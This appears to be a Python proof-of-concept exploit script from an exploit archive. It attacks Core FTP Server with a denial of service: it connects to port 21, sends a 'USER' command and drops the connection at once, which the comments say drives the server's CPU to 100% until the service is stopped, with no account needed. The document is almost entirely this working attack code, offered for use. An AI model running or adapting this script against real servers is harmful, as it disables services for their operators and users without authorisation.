27 lines
No EOL
695 B
Python
Executable file
27 lines
No EOL
695 B
Python
Executable file
# Note: FTP account is not required for exploitation
|
|
# http://www.mertsarica.com
|
|
# I discovered a denial-of-service vulnerability on Core FTP Server product.
|
|
# When you send "USER test\r\n" and then kills the connection
|
|
# immediately, cpu increases to 100% and stays at that level until you
|
|
# stop the ftp service.
|
|
|
|
|
|
import socket, sys
|
|
|
|
HOST = 'localhost'
|
|
PORT = 21
|
|
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
|
|
try:
|
|
s.connect((HOST, PORT))
|
|
except:
|
|
print "Connection error"
|
|
sys.exit(1)
|
|
|
|
try:
|
|
s.send('USER MS\r\n') # magic packet
|
|
s.close()
|
|
print("Very good, young padawan, but you still have much to learn...")
|
|
except:
|
|
print "Connection error"
|
|
sys.exit(1) |